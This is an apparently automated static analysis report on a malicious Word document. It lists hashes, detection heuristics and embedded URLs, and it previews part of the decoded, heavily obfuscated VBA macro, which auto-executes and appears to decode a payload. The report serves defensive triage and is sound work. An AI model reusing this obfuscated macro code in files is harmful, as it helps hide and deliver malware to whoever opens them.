Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 19dfc8c4ef9d76ae…

MALICIOUS

Office (OLE)

182.5 KB Created: 2018-04-12 17:00:00 Authoring application: Microsoft Office Word First seen: 2019-05-31
MD5: 9ce25981e7adaa52350f092661eb6b46 SHA-1: 7cbdb7683c95e0d297d1d2940634a55ff7e5922c SHA-256: 19dfc8c4ef9d76ae08511a3eb825bcde5332c616e31afc1ccbb2be0c86ca355a
224 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is a malicious Office document containing a VBA macro with an AutoOpen function, indicating it attempts to execute automatically upon opening. Heuristics suggest obfuscated code and the use of CreateObject, commonly employed to download and execute further stages. The presence of a suspicious URL warrants further investigation.

Heuristics 8

  • ClamAV: Doc.Macro.Obfuscated-6397052-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.Obfuscated-6397052-2
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.isprambiente.gov.it/files/temi/rischio-industriale/stabilimenti.jpg In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
    • http://purl.org/dc/elements/1.1/In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 174215 bytes
SHA-256: 93afe79c5c842642a9e14046788e4c84a07aa85ca69f495a7b11426b16174be2
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "AZ44wa"
Public Function QVhfFJCkPDZ2Sop0(Pk7TunAk5FSv6M1 As String, Optional af62E5RKszZrcP As Boolean = True) As String
Static tUkrEWdMUbSnPUk(0 To 255) As Byte
Dim GCEBm0k2NFZkEL As Integer
Dim ampEGYOZmqU6k91R() As Byte, iBKhek7leyen2b() As Byte
Dim zMTehrzumBIxfm As String
zMTehrzumBIxfm = Application.UserName
Dim HWH6SNtM4VM, G9OlSZcSwS7R8L As Integer
G9OlSZcSwS7R8L = Len(zMTehrzumBIxfm)
Dim df30Kli0nRl As Collection
While G9OlSZcSwS7R8L > 5
HWH6SNtM4VM = HWH6SNtM4VM + 3
G9OlSZcSwS7R8L = G9OlSZcSwS7R8L - 1
Wend
Dim v4cZk82UhU5IVr As Collection
Set v4cZk82UhU5IVr = New Collection
v4cZk82UhU5IVr.Add "df30Kli0nRl"
v4cZk82UhU5IVr.Add "BLy7gJpHJyS"
v4cZk82UhU5IVr.Add "dhwMXRX4ljTIYV"
Dim bu3qyAT3GckgxO As Integer
Dim hVtDSUpsS9Zuul, n1L85AhExlS As String
hVtDSUpsS9Zuul = 6
n1L85AhExlS = 5
#If hVtDSUpsS9Zuul > n1L85AhExlS Then
Dim gtqz9oOIrYv As LongPtr
#Else
Dim gtqz9oOIrYv As Integer
gtqz9oOIrYv = 6 + 5
Dim taGow089MeQ As Integer
For taGow089MeQ = 0 To hVtDSUpsS9Zuul
taGow089MeQ = taGow089MeQ + 1
Next taGow089MeQ
#End If
Dim RLlDN98v2ROrG0, VzWELFMYx0A As String
RLlDN98v2ROrG0 = 6
VzWELFMYx0A = 7
#If RLlDN98v2ROrG0 > VzWELFMYx0A Then
Dim qQupbDz6ooB As LongPtr
#Else
Dim qQupbDz6ooB As Integer
qQupbDz6ooB = 6 + 7
Dim uNaftBXHE9c As Integer
For uNaftBXHE9c = 0 To RLlDN98v2ROrG0
uNaftBXHE9c = uNaftBXHE9c + 1
Next uNaftBXHE9c
#End If
Dim SlBrHgAGhspIKC As Integer
For J2Ge64n9ABH = 2 To 24
SlBrHgAGhspIKC = J2Ge64n9ABH
Next J2Ge64n9ABH
Dim AuPVkiG2Gcn9FBt As Long, VuNcJolDzF4wDkR4kg As Long
Dim ndVnryEWueX0Sh, l4LeJqX5GuW As Integer
ndVnryEWueX0Sh = 3
l4LeJqX5GuW = 4
#If lty7h8Q805T <> 0 Then
lty7h8Q805T = lty7h8Q805T + 2
Dim Yma5dcgcPgV As Variant
Else
Dim Yma5dcgcPgV As Object
#End If
If ndVnryEWueX0Sh > l4LeJqX5GuW Then
For VZDNs0SFxWkQ7E = l4LeJqX5GuW To ndVnryEWueX0Sh
l4LeJqX5GuW = l4LeJqX5GuW / ndVnryEWueX0Sh
Next VZDNs0SFxWkQ7E
End If
If tUkrEWdMUbSnPUk(0) = 0 Then
Dim jvF61Vc0NDU6Io As Object
Dim QSMAmwx3SOCh4G, VUOIS5d7tA0 As Integer
QSMAmwx3SOCh4G = 8
VUOIS5d7tA0 = 3
#If ezBn99ETDwj <> 0 Then
ezBn99ETDwj = ezBn99ETDwj + 3
Dim Bzq7dtCY8Xw As Variant
Else
Dim Bzq7dtCY8Xw As Object
#End If
If QSMAmwx3SOCh4G > VUOIS5d7tA0 Then
For KxeAERoCWiMKB8 = VUOIS5d7tA0 To QSMAmwx3SOCh4G
VUOIS5d7tA0 = VUOIS5d7tA0 / QSMAmwx3SOCh4G
Next KxeAERoCWiMKB8
End If
For AuPVkiG2Gcn9FBt = 0 To 255
Dim dx3yezzVvQLJAS As String
Dim KUbUPzAoMatPyr As Integer
Dim rcsAVMiM4a0 As String
KUbUPzAoMatPyr = 7382
Dim eEQXUTRTi1x As Integer
rcsAVMiM4a0 = Right(CStr(KUbUPzAoMatPyr), 1)
eEQXUTRTi1x = CInt(rcsAVMiM4a0)
For TkNDvdTWQbs = eEQXUTRTi1x To 38
KUbUPzAoMatPyr = KUbUPzAoMatPyr + 9
Next TkNDvdTWQbs
Dim pSaE3iJY22s8yw As String
Dim YVr2aXGiUBM As String
YVr2aXGiUBM = XOxfcVhSXtf
pSaE3iJY22s8yw = bwG10Fw1BSD
If (StrComp(pSaE3iJY22s8yw, YVr2aXGiUBM, vbTextCompare) <> 0) Then
MsgBox ("Optional: R7ki7ksBO7Y2bT.")
End If
Dim ykWeiI4oifMWU0 As Integer
Dim glRAwmLBL9c As String
ykWeiI4oifMWU0 = 9621
Dim ZY7DZd8fHNF As Integer
glRAwmLBL9c = Right(CStr(ykWeiI4oifMWU0), 1)
ZY7DZd8fHNF = CInt(glRAwmLBL9c)
For EiZqBHAByZI = ZY7DZd8fHNF To 26
ykWeiI4oifMWU0 = ykWeiI4oifMWU0 + 8
Next EiZqBHAByZI
Dim S6Eg28li5gvP1R, BpJ5OL9rfRU As Integer
S6Eg28li5gvP1R = 3
BpJ5OL9rfRU = 9
#If RbWnSW0zNNJ <> 0 Then
RbWnSW0zNNJ = RbWnSW0zNNJ + 6
Dim bgILjear3B5 As Variant
Else
Dim bgILjear3B5 As Object
#End If
If S6Eg28li5gvP1R > BpJ5OL9rfRU Then
For QyhvVbhgpazMhh = BpJ5OL9rfRU To S6Eg28li5gvP1R
BpJ5OL9rfRU = BpJ5OL9rfRU / S6Eg28li5gvP1R
Next QyhvVbhgpazMhh
End If
tUkrEWdMUbSnPUk(AuPVkiG2Gcn9FBt) = 255
Dim ewg8iRQ6ZIiY5C As Object
Dim sSTCF1uMmJx45X, oDxqiHBqfSz As Integer
sSTCF1uMmJx45X = 4
oDxqiHBqfSz = 6
#If ORZmkl7r6fC <> 0 Then
ORZmkl7r6fC = ORZmkl7
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.